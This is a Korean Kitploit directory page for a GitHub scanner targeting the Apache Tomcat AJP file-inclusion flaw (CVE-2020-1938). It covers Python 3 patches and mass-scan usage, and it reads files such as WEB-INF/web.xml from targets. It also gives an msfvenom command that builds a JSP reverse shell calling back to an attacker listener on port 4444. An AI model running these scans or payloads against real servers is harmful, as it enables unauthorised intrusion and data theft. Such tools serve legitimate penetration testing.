Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CNVD-2020-10487 — CVE-2020-1938 / CNVD-2020-1048 탐지 도구 | Kitploit
도구/GitHubGitHub/doggycheng/cnvd-2020-10487
Vulnerability ScannersExploitationShellcodeWeb Application ExploitationPenetration TestingPayload Development
GitHubdoggycheng/cnvd-2020-10487

CNVD-2020-10487

CVE-2020-1938 / CNVD-2020-1048 탐지 도구

저장소 보기
866년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

설명

도구는 보안 연구 및 내부 점검 용도로만 사용되며, 불법 공격에 사용하는 것을 금지합니다. 발생하는 모든 책임은 사용자에게 있습니다.

Apache Tomcat 파일 포함 취약점 (CVE-2020-1938 / CNVD-2020-1048) 일괄 탐지 도구.

이 프로젝트는 Kit4y의 프로젝트를 기반으로 수정되었습니다.

코드 수정

ip.txt에 도메인 또는 IP가 하나만 있을 경우 threadCount가 1이 되어 프로그램이 실제로 실행되지 않으므로, 스레드 수를 확인하는 코드를 추가했습니다.

root@kitploit:~
  
...  
if threadCount == 1:  
    threadCount = 2  
for i in range(0,threadCount-1):  
...  
Python3 호환을 위해 일부 코드를 수정했습니다. 수정 전 코드
root@kitploit:~
  
self.stream = self.socket.makefile("rb", bufsize=0)  
root@kitploit:~
  
print("".join([d.data for d in data]))  
수정 후 코드
root@kitploit:~
  
if sys.version_info < (3, 0):  
    self.stream = self.socket.makefile("rb", bufsize=0)  
else:  
    self.stream = self.socket.makefile("rb", buffering=None)  
root@kitploit:~
  
if sys.version_info < (3, 0):  
    print("".join([d.data for d in data]))  
else:  
    print(b"".join([d.data for d in data]).decode("UTF-8"))  

사용

일괄 탐지

1. 스캔할 도메인/IP를 ip.txt에 넣습니다. 예:

127.0.0.1
www.baidu.com
www.google.com

2. python threading-find-port-8009.py

ip.txt의 도메인/IP를 스캔하여 8009 포트가 열린 것을 찾아 생성된 8009.txt에 저장합니다.

3. python threading-CNVD-2020-10487-Tomcat-Ajp-lfi.py

8009.txt에서 취약점에 해당하는 URL을 필터링하여 vul.txt에 저장합니다. 최종적으로 vul.txt에 있는 도메인이 취약점이 있는 도메인입니다.

단일 사이트 탐지

python CNVD-2020-10487-Tomcat-Ajp-lfi.py target.com

python CNVD-2020-10487-Tomcat-Ajp-lfi.py -f /WEB-INF/web.xml 192.168.125.128

python CNVD-2020-10487-Tomcat-Ajp-lfi.py -f /index.jsp 192.168.125.128

디렉토리 이동 및 리버스 셸

기본적으로 webapps의 ROOT를 읽습니다. "/asdf"를 "/test/asdf"로 수정하면 webapps 아래 test 디렉토리의 내용에 접근할 수 있습니다.

root@kitploit:~
  
t.perform_request('/asdf',attributes=[  

서버에 파일 업로드 취약점이 동시에 존재하는 경우, 아래의 shell.txt를 업로드합니다.

root@kitploit:~
  
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.125.130 LPORT=4444 > shell.txt  

"/asdf"를 "/asdf.jsp"로 수정한 후 MSF를 시작하고 PoC 도구를 사용하여 셸을 획득할 수 있습니다.

기타 관련 도구

https://github.com/0nise/CVE-2020-1938
https://github.com/hypn0s/AJPy
https://github.com/00theway/Ghostcat-CNVD-2020-10487

도구 다운로드